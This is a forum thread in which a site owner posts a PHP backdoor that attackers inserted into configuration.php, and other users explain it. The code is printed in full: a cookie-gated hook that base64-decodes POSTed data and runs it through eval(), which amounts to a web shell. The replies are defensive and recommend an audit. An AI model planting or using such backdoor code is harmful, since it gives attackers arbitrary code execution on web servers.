0

My site was hacked. They inserted this into livesite on configuartion.php

if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) { $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) eval($d);}
echo '<name=c></textarea>';exit;}

what does it say???

Thanks

Edited by peter_budo: Keep It Clear - Do wrap your programming code blocks within [code] ... [/code] tags

4
Contributors
7
Replies
8
Views
5 Years
Discussion Span
Last Post by mslade
0

are you PHP developer? You can search each function and get explanations from php manual!

no I'm not, that's why I asked you guys.

1

My site was hacked. They inserted this into livesite on configuartion.php

if (!empty($_COOKIE) and $_COOKIE=='d'){if (!empty($_POST)) { $d=base64_decode(str_replace(' ','+',$_POST));if($d) eval($d);}
echo '<name=c></textarea>';exit;}

what does it say???

Thanks

This lets someone include encoded PHP code in the request, which will be executed on the server. This allows them to execute arbitrary PHP code with the permissions of your web server.

0

Thanks for the answer. And so, how exactly did they get to that configuration.php file?

0

Thanks for the answer. And so, how exactly did they get to that configuration.php file?

There's plenty of ways attackers can compromise your stuff. Your web app was vulnerable, your network was vulnerable, you're running outdated software, etc. If you're on shared hosting, I agree with the other poster -- talk to your host first.

The important thing is that if you don't identify how they get in and close it up, it'll just happen again. Until you can do a full code audit for other potential changes they made, you can't really trust your website and should still consider it compromised.

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.